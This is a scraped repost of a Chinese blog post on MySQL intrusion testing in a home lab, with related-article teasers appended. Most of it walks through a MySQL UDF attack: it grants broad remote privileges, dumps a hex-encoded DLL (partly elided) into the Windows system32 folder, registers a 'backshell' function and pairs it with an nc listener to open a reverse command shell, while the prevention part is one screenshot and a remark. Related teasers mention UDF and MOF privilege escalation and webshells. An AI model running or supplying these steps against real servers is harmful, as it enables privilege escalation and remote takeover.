backshell mysql_MySql的入侵测试以及防范_MySQL

最新推荐文章于 2022-07-30 11:25:22 发布
最新推荐文章于 2022-07-30 11:25:22 发布
阅读量194 收藏
点赞数
文章标签: backshell mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34800530/article/details/114487532
版权

bitsCN.com

在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。

总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。

正题之一

物理机:Win7

虚拟机:XP

给予mysql远程权限:1 grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码';2 3 flush privileges;

给物理机远程权限:

1405L21C0N10-19D0.jpg

物理机成功连接上:

1405L21D35940-22506.jpg

执行侵入测试前(有图有真相):

1405L21DN120-35645.jpg

执行侵入测试后(有图有真相):

1405L21E60940-44335.jpg

重启前(有图有真相):

1405L21F3K0-52N3.jpg

重启后(有图有真相):

1405L21FT3P-D617.jpg

正题之二:

远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件:

1405L21G343P-O213.jpg

Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号

虚拟机上:执行映射:select backshell("物理机IP",端口号);

这便执行了3306端口反弹CMD

(没图了。。。用到了一个nc软件执行的映射)

yyd.txt大概内容:et @a=concat('',0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400);create table yyd(data LONGBLOB);insert into yyd values("");updateyyd set data = @a;select data from yyd into DUMPFILE 'c://windows//system32//yyd.dll';CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';

正题之三:

防范

1405L21GK0-TS1.jpg

感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了。。。。好丢脸,只好把Win7上的MySql服务拿出来了。

觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多。

转载请注明出处:http://www.cnblogs.com/yydcdut/p/3464215.htmlbitsCN.com

相关标签:神马

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

我叫土鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql反弹提权_MySQL数据库反弹端口连接提权
weixin_42545292的博客
01-19 722
【51CTO.com原创稿件】在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令。在一般的情况下,也就放弃了。但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:(1)通过网站无法获取webshell(2)Webshell无法执行命令(3)有phpmyadmin和root账号,无法查询或者无法获取网...
backshell mysql_MySql BackShell
weixin_39655049的博客
01-28 166
1. 检查是log_bin是否开启增量备份需要开启log_bin若状态为on 则是已经开启log_binmysql> show variables like '%log_bin%';+---------------------------------+-------+| Variable_name | Value |+-------------------...
mysql命令入侵_My SQL防入侵方法大全_MySQL
weixin_39883208的博客
01-19 196
MYSQL用户ROOT密码为空时是一个很大的漏洞,在网上也有许多一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??后来,自己思索想到一个办法,且在测试的几台有此漏洞的机中均获得了成功,现将攻击方法公布如下:1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe...
mysql 防攻击_mysql8 参考手册--使MySQL防范攻击者确保安全
weixin_30367805的博客
01-19 181
连接到MySQL服务器时,应使用密码。密码不会以明文形式通过连接传输。所有其他信息均以文本形式传输,任何能够查看连接的人都可以阅读。如果客户端和服务器之间的连接通过不受信任的网络,并且您对此感到担心,则可以使用压缩协议使通信更难以解密。您还可以使用MySQL的内部SSL支持来使连接更加安全。请参见 第6.3节“使用加密的连接”。或者,使用SSH获取MySQL服务器和MySQL客户端之间的加密TCP...
Mysql数据库的安全策略
q908544703的博客
07-30 4338
mysql 安全策略
MySQL提权篇
热门推荐
Grey的博客
05-12 3万+
一、Mysql提权必备条件1.服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行权限对于Mysql数据库服务运行权限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
udf dell源码 usl免杀源码
11-01
DLL中的每个函数都经多次测试,不太可能会造成MYSQL假死等现象,但也不排除在特殊环境、特殊输入下出错的可能性。 使用过程中发现的bug可和我联系QQ:185826531(langouster) 源程序公开,可以任意修改和添加功能,散布...
TCP版backshell的VBS脚本代码
09-06
### TCP版Backshell的VBS脚本代码解析 #### 一、概述 本文将深入解析一个TCP版Backshell的VBS脚本代码。该脚本主要用于建立与远程服务器之间的TCP连接,并通过执行命令来实现对目标系统的控制。下面将详细介绍脚本...
MySQL注入点写入WebShell的几种方式
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
教你一些MySQL数据库入侵及防御方法
老班长的博客
09-05 5805
一、MySQL 信息收集 1、端口信息收集 MySQL 默认端口是 3306 端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: d47e62d2b349aca45e42305ed6714efbe5ed61d9iisputter,直接填写 3306 端口,IP 地址填写单个或者 C 段地址; d47e62d2b349aca45e42305ed6714efbe5ed...
MySQL数据库渗透及漏洞利用总结
05-09 4168
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
Mysql数据库渗透及漏洞利用总结
Fly_鹏程万里
07-07 4013
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然...
mysql弱口令加强,Mysql弱口令取得系统权限(续)
weixin_39767121的博客
03-18 449
春节期间电脑由于Mysql弱口令导致系统被入侵,这两天一直在模拟入侵过程。在网上查阅了好多资料,也问了几个网友,最终成功地利用Mysql弱口令入侵了我自己的电脑。前面的入侵过程没有问题,问题出在了那个my_udf.dll文件上,我判断可能是由于数据库版本的不同,新版本的数据库已经不再支持my_udf.dll文件函数造成的。之前还到处下载my_udf.dll这个文件,其实这个文件已经不能用了。后来在...
MYSQL提权总结
weixin_30892889的博客
01-23 397
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。 一、利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (S...
mysql两种提权方式
mohanhan
06-24 2573
mysql两种提权方式Mysql_UDF提权提权要求提权方法Mysql mof提权提权要求提权方法一般方式msf自带提权模块Mysql反弹端口连接提权 Mysql_UDF提权 提权要求 1.目标系统是Windows(Win2000,XP,Win2003); 2.如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下 注: 该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建lib\plugin文件夹,然后将ud
为啥mysql老是被攻击_如何防止入侵MySQL各种攻击方法大全_PHP教程
weixin_28816215的博客
02-11 1241
MYSQL用户ROOT密码为空时是一个很大的漏洞,在网上也有许多一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??后来,自己思索想到一个办法,且在测试的几台有此漏洞的机中均获得了成功,现将攻击方法公布如下:1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe...
MySql入侵测试以及防范
weixin_30832351的博客
12-09 63
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。 总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。 正题之一 物理机:Win7 虚拟机:XP 给予mysql远程权限: 1 grant all privilege...
Mysql被黑客入侵及安全措施总结
唯细水静流
02-18 8210
今天登陆在腾讯云服务器上搭建的Mysql数据库,发现数据库被黑了,黑客提示十分明显。 Mysql中只剩下两个数据库,一个是`information_schema`,另一个是黑客创建的`PLEASE_READ`,其中有一张`info`表。
MySQL提权原理及过程
kuiguowei的博客
01-12 1915
mof提权原理 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管
Omron与计算机通讯电缆接法详解及配件
4. OMRON DB-25 BACKSHELL WITH 2.6MM JACK SCREWS: 该组件是DB-25插头的保护外壳,带有2.6毫米直径的螺丝,确保插头固定稳固。 5. OMRON DE-9 BACKSHELL WITH #4-40 SCREWS: 类似的DE-9插头保护壳,采用#4-40规格...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值